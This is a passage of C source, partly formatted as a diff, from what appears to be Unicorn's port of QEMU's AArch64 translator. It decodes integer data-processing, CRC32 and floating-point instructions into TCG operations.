TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); + + tcg_gen_andi_i64(tcg_ctx, tcg_tmp, tcg_rn, 0xffff); + tcg_gen_bswap16_i64(tcg_ctx, tcg_rd, tcg_tmp); + + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 16); + tcg_gen_andi_i64(tcg_ctx, tcg_tmp, tcg_tmp, 0xffff); + tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, 16, 16); + + if (sf) { + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 32); + tcg_gen_andi_i64(tcg_ctx, tcg_tmp, tcg_tmp, 0xffff); + tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, 32, 16); + + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 48); + tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, 48, 16); + } + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* C3.5.7 Data-processing (1 source) + * 31 30 29 28 21 20 16 15 10 9 5 4 0 + * +----+---+---+-----------------+---------+--------+------+------+ + * | sf | 1 | S | 1 1 0 1 0 1 1 0 | opcode2 | opcode | Rn | Rd | + * +----+---+---+-----------------+---------+--------+------+------+ + */ +static void disas_data_proc_1src(DisasContext *s, uint32_t insn) +{ + unsigned int sf, opcode, rn, rd; + + if (extract32(insn, 29, 1) || extract32(insn, 16, 5)) { + unallocated_encoding(s); + return; + } + + sf = extract32(insn, 31, 1); + opcode = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + switch (opcode) { + case 0: /* RBIT */ + handle_rbit(s, sf, rn, rd); + break; + case 1: /* REV16 */ + handle_rev16(s, sf, rn, rd); + break; + case 2: /* REV32 */ + handle_rev32(s, sf, rn, rd); + break; + case 3: /* REV64 */ + handle_rev64(s, sf, rn, rd); + break; + case 4: /* CLZ */ + handle_clz(s, sf, rn, rd); + break; + case 5: /* CLS */ + handle_cls(s, sf, rn, rd); + break; + } +} + +static void handle_div(DisasContext *s, 
bool is_signed, unsigned int sf, + unsigned int rm, unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_n, tcg_m, tcg_rd; + tcg_rd = cpu_reg(s, rd); + + if (!sf && is_signed) { + tcg_n = new_tmp_a64(s); + tcg_m = new_tmp_a64(s); + tcg_gen_ext32s_i64(tcg_ctx, tcg_n, cpu_reg(s, rn)); + tcg_gen_ext32s_i64(tcg_ctx, tcg_m, cpu_reg(s, rm)); + } else { + tcg_n = read_cpu_reg(s, rn, sf); + tcg_m = read_cpu_reg(s, rm, sf); + } + + if (is_signed) { + gen_helper_sdiv64(tcg_ctx, tcg_rd, tcg_n, tcg_m); + } else { + gen_helper_udiv64(tcg_ctx, tcg_rd, tcg_n, tcg_m); + } + + if (!sf) { /* zero extend final result */ + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } +} + +/* C5.6.115 LSLV, C5.6.118 LSRV, C5.6.17 ASRV, C5.6.154 RORV */ +static void handle_shift_reg(DisasContext *s, + enum a64_shift_type shift_type, unsigned int sf, + unsigned int rm, unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_shift = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); + + tcg_gen_andi_i64(tcg_ctx, tcg_shift, cpu_reg(s, rm), sf ? 
63 : 31); + shift_reg(tcg_ctx, tcg_rd, tcg_rn, sf, shift_type, tcg_shift); + tcg_temp_free_i64(tcg_ctx, tcg_shift); +} + +/* CRC32[BHWX], CRC32C[BHWX] */ +static void handle_crc32(DisasContext *s, + unsigned int sf, unsigned int sz, bool crc32c, + unsigned int rm, unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_acc, tcg_val; + TCGv_i32 tcg_bytes; + + if (!arm_dc_feature(s, ARM_FEATURE_CRC) + || (sf == 1 && sz != 3) + || (sf == 0 && sz == 3)) { + unallocated_encoding(s); + return; + } + + if (sz == 3) { + tcg_val = cpu_reg(s, rm); + } else { + uint64_t mask; + switch (sz) { + case 0: + mask = 0xFF; + break; + case 1: + mask = 0xFFFF; + break; + case 2: + mask = 0xFFFFFFFF; + break; + default: + g_assert_not_reached(); + } + tcg_val = new_tmp_a64(s); + tcg_gen_andi_i64(tcg_ctx, tcg_val, cpu_reg(s, rm), mask); + } + + tcg_acc = cpu_reg(s, rn); + tcg_bytes = tcg_const_i32(tcg_ctx, 1 << sz); + + if (crc32c) { + gen_helper_crc32c_64(tcg_ctx, cpu_reg(s, rd), tcg_acc, tcg_val, tcg_bytes); + } else { + gen_helper_crc32_64(tcg_ctx, cpu_reg(s, rd), tcg_acc, tcg_val, tcg_bytes); + } + + tcg_temp_free_i32(tcg_ctx, tcg_bytes); +} + +/* C3.5.8 Data-processing (2 source) + * 31 30 29 28 21 20 16 15 10 9 5 4 0 + * +----+---+---+-----------------+------+--------+------+------+ + * | sf | 0 | S | 1 1 0 1 0 1 1 0 | Rm | opcode | Rn | Rd | + * +----+---+---+-----------------+------+--------+------+------+ + */ +static void disas_data_proc_2src(DisasContext *s, uint32_t insn) +{ + unsigned int sf, rm, opcode, rn, rd; + sf = extract32(insn, 31, 1); + rm = extract32(insn, 16, 5); + opcode = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (extract32(insn, 29, 1)) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 2: /* UDIV */ + handle_div(s, false, sf, rm, rn, rd); + break; + case 3: /* SDIV */ + handle_div(s, true, sf, rm, rn, rd); + break; + case 8: /* LSLV */ + 
handle_shift_reg(s, A64_SHIFT_TYPE_LSL, sf, rm, rn, rd); + break; + case 9: /* LSRV */ + handle_shift_reg(s, A64_SHIFT_TYPE_LSR, sf, rm, rn, rd); + break; + case 10: /* ASRV */ + handle_shift_reg(s, A64_SHIFT_TYPE_ASR, sf, rm, rn, rd); + break; + case 11: /* RORV */ + handle_shift_reg(s, A64_SHIFT_TYPE_ROR, sf, rm, rn, rd); + break; + case 16: + case 17: + case 18: + case 19: + case 20: + case 21: + case 22: + case 23: /* CRC32 */ + { + int sz = extract32(opcode, 0, 2); + bool crc32c = extract32(opcode, 2, 1); + handle_crc32(s, sf, sz, crc32c, rm, rn, rd); + break; + } + default: + unallocated_encoding(s); + break; + } +} + +/* C3.5 Data processing - register */ +static void disas_data_proc_reg(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 24, 5)) { + case 0x0a: /* Logical (shifted register) */ + disas_logic_reg(s, insn); + break; + case 0x0b: /* Add/subtract */ + if (insn & (1 << 21)) { /* (extended register) */ + disas_add_sub_ext_reg(s, insn); + } else { + disas_add_sub_reg(s, insn); + } + break; + case 0x1b: /* Data-processing (3 source) */ + disas_data_proc_3src(s, insn); + break; + case 0x1a: + switch (extract32(insn, 21, 3)) { + case 0x0: /* Add/subtract (with carry) */ + disas_adc_sbc(s, insn); + break; + case 0x2: /* Conditional compare */ + disas_cc(s, insn); /* both imm and reg forms */ + break; + case 0x4: /* Conditional select */ + disas_cond_select(s, insn); + break; + case 0x6: /* Data-processing */ + if (insn & (1 << 30)) { /* (1 source) */ + disas_data_proc_1src(s, insn); + } else { /* (2 source) */ + disas_data_proc_2src(s, insn); + } + break; + default: + unallocated_encoding(s); + break; + } + break; + default: + unallocated_encoding(s); + break; + } +} + +static void handle_fp_compare(DisasContext *s, bool is_double, + unsigned int rn, unsigned int rm, + bool cmp_with_zero, bool signal_all_nans) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_flags = tcg_temp_new_i64(tcg_ctx); + TCGv_ptr fpst = 
get_fpstatus_ptr(tcg_ctx); + + if (is_double) { + TCGv_i64 tcg_vn, tcg_vm; + + tcg_vn = read_fp_dreg(s, rn); + if (cmp_with_zero) { + tcg_vm = tcg_const_i64(tcg_ctx, 0); + } else { + tcg_vm = read_fp_dreg(s, rm); + } + if (signal_all_nans) { + gen_helper_vfp_cmped_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); + } else { + gen_helper_vfp_cmpd_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); + } + tcg_temp_free_i64(tcg_ctx, tcg_vn); + tcg_temp_free_i64(tcg_ctx, tcg_vm); + } else { + TCGv_i32 tcg_vn, tcg_vm; + + tcg_vn = read_fp_sreg(s, rn); + if (cmp_with_zero) { + tcg_vm = tcg_const_i32(tcg_ctx, 0); + } else { + tcg_vm = read_fp_sreg(s, rm); + } + if (signal_all_nans) { + gen_helper_vfp_cmpes_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); + } else { + gen_helper_vfp_cmps_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); + } + tcg_temp_free_i32(tcg_ctx, tcg_vn); + tcg_temp_free_i32(tcg_ctx, tcg_vm); + } + + tcg_temp_free_ptr(tcg_ctx, fpst); + + gen_set_nzcv(tcg_ctx, tcg_flags); + + tcg_temp_free_i64(tcg_ctx, tcg_flags); +} + +/* C3.6.22 Floating point compare + * 31 30 29 28 24 23 22 21 20 16 15 14 13 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+-----+---------+------+-------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | op | 1 0 0 0 | Rn | op2 | + * +---+---+---+-----------+------+---+------+-----+---------+------+-------+ + */ +static void disas_fp_compare(DisasContext *s, uint32_t insn) +{ + unsigned int mos, type, rm, op, rn, opc, op2r; + + mos = extract32(insn, 29, 3); + type = extract32(insn, 22, 2); /* 0 = single, 1 = double */ + rm = extract32(insn, 16, 5); + op = extract32(insn, 14, 2); + rn = extract32(insn, 5, 5); + opc = extract32(insn, 3, 2); + op2r = extract32(insn, 0, 3); + + if (mos || op || op2r || type > 1) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + handle_fp_compare(s, type, rn, rm, opc & 1, opc & 2); +} + +/* C3.6.23 Floating point conditional compare + * 31 30 29 28 24 23 22 21 20 16 15 
12 11 10 9 5 4 3 0 + * +---+---+---+-----------+------+---+------+------+-----+------+----+------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | cond | 0 1 | Rn | op | nzcv | + * +---+---+---+-----------+------+---+------+------+-----+------+----+------+ + */ +static void disas_fp_ccomp(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int mos, type, rm, cond, rn, op, nzcv; + TCGv_i64 tcg_flags; + int label_continue = -1; + + mos = extract32(insn, 29, 3); + type = extract32(insn, 22, 2); /* 0 = single, 1 = double */ + rm = extract32(insn, 16, 5); + cond = extract32(insn, 12, 4); + rn = extract32(insn, 5, 5); + op = extract32(insn, 4, 1); + nzcv = extract32(insn, 0, 4); + + if (mos || type > 1) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (cond < 0x0e) { /* not always */ + int label_match = gen_new_label(tcg_ctx); + label_continue = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond, label_match); + /* nomatch: */ + tcg_flags = tcg_const_i64(tcg_ctx, nzcv << 28); + gen_set_nzcv(tcg_ctx, tcg_flags); + tcg_temp_free_i64(tcg_ctx, tcg_flags); + tcg_gen_br(tcg_ctx, label_continue); + gen_set_label(tcg_ctx, label_match); + } + + handle_fp_compare(s, type, rn, rm, false, op); + + if (cond < 0x0e) { + gen_set_label(tcg_ctx, label_continue); + } +} + +/* copy src FP register to dst FP register; type specifies single or double */ +static void gen_mov_fp2fp(DisasContext *s, int type, int dst, int src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (type) { + TCGv_i64 v = read_fp_dreg(s, src); + write_fp_dreg(s, dst, v); + tcg_temp_free_i64(tcg_ctx, v); + } else { + TCGv_i32 v = read_fp_sreg(s, src); + write_fp_sreg(s, dst, v); + tcg_temp_free_i32(tcg_ctx, v); + } +} + +/* C3.6.24 Floating point conditional select + * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+------+-----+------+------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | 
cond | 1 1 | Rn | Rd | + * +---+---+---+-----------+------+---+------+------+-----+------+------+ + */ +static void disas_fp_csel(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int mos, type, rm, cond, rn, rd; + int label_continue = -1; + + mos = extract32(insn, 29, 3); + type = extract32(insn, 22, 2); /* 0 = single, 1 = double */ + rm = extract32(insn, 16, 5); + cond = extract32(insn, 12, 4); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (mos || type > 1) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (cond < 0x0e) { /* not always */ + int label_match = gen_new_label(tcg_ctx); + label_continue = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond, label_match); + /* nomatch: */ + gen_mov_fp2fp(s, type, rd, rm); + tcg_gen_br(tcg_ctx, label_continue); + gen_set_label(tcg_ctx, label_match); + } + + gen_mov_fp2fp(s, type, rd, rn); + + if (cond < 0x0e) { /* continue */ + gen_set_label(tcg_ctx, label_continue); + } +} + +/* C3.6.25 Floating-point data-processing (1 source) - single precision */ +static void handle_fp_1src_single(DisasContext *s, int opcode, int rd, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr fpst; + TCGv_i32 tcg_op; + TCGv_i32 tcg_res; + + fpst = get_fpstatus_ptr(tcg_ctx); + tcg_op = read_fp_sreg(s, rn); + tcg_res = tcg_temp_new_i32(tcg_ctx); + + switch (opcode) { + case 0x0: /* FMOV */ + tcg_gen_mov_i32(tcg_ctx, tcg_res, tcg_op); + break; + case 0x1: /* FABS */ + gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_op); + break; + case 0x2: /* FNEG */ + gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_op); + break; + case 0x3: /* FSQRT */ + gen_helper_vfp_sqrts(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); + break; + case 0x8: /* FRINTN */ + case 0x9: /* FRINTP */ + case 0xa: /* FRINTM */ + case 0xb: /* FRINTZ */ + case 0xc: /* FRINTA */ + { + TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(opcode & 7)); + + 
gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + gen_helper_rints(tcg_ctx, tcg_res, tcg_op, fpst); + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + break; + } + case 0xe: /* FRINTX */ + gen_helper_rints_exact(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0xf: /* FRINTI */ + gen_helper_rints(tcg_ctx, tcg_res, tcg_op, fpst); + break; + default: + abort(); + } + + write_fp_sreg(s, rd, tcg_res); + + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i32(tcg_ctx, tcg_op); + tcg_temp_free_i32(tcg_ctx, tcg_res); +} + +/* C3.6.25 Floating-point data-processing (1 source) - double precision */ +static void handle_fp_1src_double(DisasContext *s, int opcode, int rd, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr fpst; + TCGv_i64 tcg_op; + TCGv_i64 tcg_res; + + fpst = get_fpstatus_ptr(tcg_ctx); + tcg_op = read_fp_dreg(s, rn); + tcg_res = tcg_temp_new_i64(tcg_ctx); + + switch (opcode) { + case 0x0: /* FMOV */ + tcg_gen_mov_i64(tcg_ctx, tcg_res, tcg_op); + break; + case 0x1: /* FABS */ + gen_helper_vfp_absd(tcg_ctx, tcg_res, tcg_op); + break; + case 0x2: /* FNEG */ + gen_helper_vfp_negd(tcg_ctx, tcg_res, tcg_op); + break; + case 0x3: /* FSQRT */ + gen_helper_vfp_sqrtd(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); + break; + case 0x8: /* FRINTN */ + case 0x9: /* FRINTP */ + case 0xa: /* FRINTM */ + case 0xb: /* FRINTZ */ + case 0xc: /* FRINTA */ + { + TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(opcode & 7)); + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + gen_helper_rintd(tcg_ctx, tcg_res, tcg_op, fpst); + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + break; + } + case 0xe: /* FRINTX */ + gen_helper_rintd_exact(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0xf: /* FRINTI */ + gen_helper_rintd(tcg_ctx, tcg_res, tcg_op, fpst); + break; + default: + abort(); + 
} + + write_fp_dreg(s, rd, tcg_res); + + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i64(tcg_ctx, tcg_op); + tcg_temp_free_i64(tcg_ctx, tcg_res); +} + +static void handle_fp_fcvt(DisasContext *s, int opcode, + int rd, int rn, int dtype, int ntype) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (ntype) { + case 0x0: + { + TCGv_i32 tcg_rn = read_fp_sreg(s, rn); + if (dtype == 1) { + /* Single to double */ + TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); + gen_helper_vfp_fcvtds(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + write_fp_dreg(s, rd, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + } else { + /* Single to half */ + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + /* write_fp_sreg is OK here because top half of tcg_rd is zero */ + write_fp_sreg(s, rd, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd); + } + tcg_temp_free_i32(tcg_ctx, tcg_rn); + break; + } + case 0x1: + { + TCGv_i64 tcg_rn = read_fp_dreg(s, rn); + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + if (dtype == 0) { + /* Double to single */ + gen_helper_vfp_fcvtsd(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + } else { + /* Double to half */ + gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + /* write_fp_sreg is OK here because top half of tcg_rd is zero */ + } + write_fp_sreg(s, rd, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + break; + } + case 0x3: + { + TCGv_i32 tcg_rn = read_fp_sreg(s, rn); + tcg_gen_ext16u_i32(tcg_ctx, tcg_rn, tcg_rn); + if (dtype == 0) { + /* Half to single */ + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + write_fp_sreg(s, rd, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd); + } else { + /* Half to double */ + TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); + gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + write_fp_dreg(s, rd, 
tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + } + tcg_temp_free_i32(tcg_ctx, tcg_rn); + break; + } + default: + abort(); + } +} + +/* C3.6.25 Floating point data-processing (1 source) + * 31 30 29 28 24 23 22 21 20 15 14 10 9 5 4 0 + * +---+---+---+-----------+------+---+--------+-----------+------+------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | opcode | 1 0 0 0 0 | Rn | Rd | + * +---+---+---+-----------+------+---+--------+-----------+------+------+ + */ +static void disas_fp_1src(DisasContext *s, uint32_t insn) +{ + int type = extract32(insn, 22, 2); + int opcode = extract32(insn, 15, 6); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + + switch (opcode) { + case 0x4: case 0x5: case 0x7: + { + /* FCVT between half, single and double precision */ + int dtype = extract32(opcode, 0, 2); + if (type == 2 || dtype == type) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + + handle_fp_fcvt(s, opcode, rd, rn, dtype, type); + break; + } + case 0x0: case 0x1: case 0x2: case 0x3: + case 0x8: case 0x9: case 0xa: case 0xb: case 0xc: + case 0xe: case 0xf: + /* 32-to-32 and 64-to-64 ops */ + switch (type) { + case 0: + if (!fp_access_check(s)) { + return; + } + + handle_fp_1src_single(s, opcode, rd, rn); + break; + case 1: + if (!fp_access_check(s)) { + return; + } + + handle_fp_1src_double(s, opcode, rd, rn); + break; + default: + unallocated_encoding(s); + } + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.6.26 Floating-point data-processing (2 source) - single precision */ +static void handle_fp_2src_single(DisasContext *s, int opcode, + int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_op1; + TCGv_i32 tcg_op2; + TCGv_i32 tcg_res; + TCGv_ptr fpst; + + tcg_res = tcg_temp_new_i32(tcg_ctx); + fpst = get_fpstatus_ptr(tcg_ctx); + tcg_op1 = read_fp_sreg(s, rn); + tcg_op2 = read_fp_sreg(s, rm); + + switch (opcode) { + case 0x0: /* FMUL */ + 
        gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x1: /* FDIV */
        gen_helper_vfp_divs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x2: /* FADD */
        gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x3: /* FSUB */
        gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x4: /* FMAX */
        gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x5: /* FMIN */
        gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x6: /* FMAXNM */
        gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x7: /* FMINNM */
        gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x8: /* FNMUL */
        /* FNMUL: compute the product, then negate the result */
        gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_res);
        break;
    }

    write_fp_sreg(s, rd, tcg_res);

    tcg_temp_free_ptr(tcg_ctx, fpst);
    tcg_temp_free_i32(tcg_ctx, tcg_op1);
    tcg_temp_free_i32(tcg_ctx, tcg_op2);
    tcg_temp_free_i32(tcg_ctx, tcg_res);
}

/* C3.6.26 Floating-point data-processing (2 source) - double precision */
static void handle_fp_2src_double(DisasContext *s, int opcode,
                                  int rd, int rn, int rm)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i64 tcg_op1;
    TCGv_i64 tcg_op2;
    TCGv_i64 tcg_res;
    TCGv_ptr fpst;

    tcg_res = tcg_temp_new_i64(tcg_ctx);
    fpst = get_fpstatus_ptr(tcg_ctx);
    tcg_op1 = read_fp_dreg(s, rn);
    tcg_op2 = read_fp_dreg(s, rm);

    /* opcode values mirror the single-precision variant above */
    switch (opcode) {
    case 0x0: /* FMUL */
        gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x1: /* FDIV */
        gen_helper_vfp_divd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x2: /* FADD */
        gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x3: /* FSUB */
        gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x4: /* FMAX */
        gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x5: /* FMIN */
        gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x6: /* FMAXNM */
        gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x7: /* FMINNM */
        gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        break;
    case 0x8: /* FNMUL */
        /* FNMUL: compute the product, then negate the result */
        gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
        gen_helper_vfp_negd(tcg_ctx, tcg_res, tcg_res);
        break;
    }

    write_fp_dreg(s, rd, tcg_res);

    tcg_temp_free_ptr(tcg_ctx, fpst);
    tcg_temp_free_i64(tcg_ctx, tcg_op1);
    tcg_temp_free_i64(tcg_ctx, tcg_op2);
    tcg_temp_free_i64(tcg_ctx, tcg_res);
}

/* C3.6.26 Floating point data-processing (2 source)
 *   31  30  29 28       24 23  22  21 20  16 15     12 11 10 9    5 4    0
 * +---+---+---+-----------+------+---+------+--------+-----+------+------+
 * | M | 0 | S | 1 1 1 1 0 | type | 1 |  Rm  | opcode | 1 0 |  Rn  |  Rd  |
 * +---+---+---+-----------+------+---+------+--------+-----+------+------+
 */
static void disas_fp_2src(DisasContext *s, uint32_t insn)
{
    int type = extract32(insn, 22, 2);
    int rd = extract32(insn, 0, 5);
    int rn = extract32(insn, 5, 5);
    int rm = extract32(insn, 16, 5);
    int opcode = extract32(insn, 12, 4);

    /* opcodes above FNMUL (0x8) are unallocated */
    if (opcode > 8) {
        unallocated_encoding(s);
        return;
    }

    switch (type) {
    case 0:
        if (!fp_access_check(s)) {
            return;
        }
        handle_fp_2src_single(s, opcode, rd, rn, rm);
        break;
    case 1:
        if (!fp_access_check(s)) {
            return;
        }
        handle_fp_2src_double(s, opcode, rd, rn, rm);
        break;
    default:
        unallocated_encoding(s);
    }
}

/* C3.6.27 Floating-point data-processing (3 source) - single precision */
static void handle_fp_3src_single(DisasContext *s, bool o0, bool o1,
                                  int rd, int rn, int rm, int ra)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tcg_op1, tcg_op2, tcg_op3;
    TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx);
    TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx);

    tcg_op1 = read_fp_sreg(s, rn);
    tcg_op2 = read_fp_sreg(s, rm);
    tcg_op3 = read_fp_sreg(s, ra);

    /* These are fused multiply-add, and must be done as one
     * floating point operation with no rounding between the
     * multiplication and addition steps.
     * NB that doing the negations here as separate steps is
     * correct : an input NaN should come out with its sign bit
     * flipped if it is a negated-input.
     */
    /* o1 negates the addend (FMSUB/FNMADD forms) */
    if (o1 == true) {
        gen_helper_vfp_negs(tcg_ctx, tcg_op3, tcg_op3);
    }

    /* o0 != o1 negates the product (FNMADD/FNMSUB forms) */
    if (o0 != o1) {
        gen_helper_vfp_negs(tcg_ctx, tcg_op1, tcg_op1);
    }

    gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst);

    write_fp_sreg(s, rd, tcg_res);

    tcg_temp_free_ptr(tcg_ctx, fpst);
    tcg_temp_free_i32(tcg_ctx, tcg_op1);
    tcg_temp_free_i32(tcg_ctx, tcg_op2);
    tcg_temp_free_i32(tcg_ctx, tcg_op3);
    tcg_temp_free_i32(tcg_ctx, tcg_res);
}

/* C3.6.27 Floating-point data-processing (3 source) - double precision */
static void handle_fp_3src_double(DisasContext *s, bool o0, bool o1,
                                  int rd, int rn, int rm, int ra)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i64 tcg_op1, tcg_op2, tcg_op3;
    TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx);
    TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx);

    tcg_op1 = read_fp_dreg(s, rn);
    tcg_op2 = read_fp_dreg(s, rm);
    tcg_op3 = read_fp_dreg(s, ra);

    /* These are fused multiply-add, and must be done as one
     * floating point operation with no rounding between the
     * multiplication and addition steps.
     * NB that doing the negations here as separate steps is
     * correct : an input NaN should come out with its sign bit
     * flipped if it is a negated-input.
     */
    if (o1 == true) {
        gen_helper_vfp_negd(tcg_ctx, tcg_op3, tcg_op3);
    }

    if (o0 != o1) {
        gen_helper_vfp_negd(tcg_ctx, tcg_op1, tcg_op1);
    }

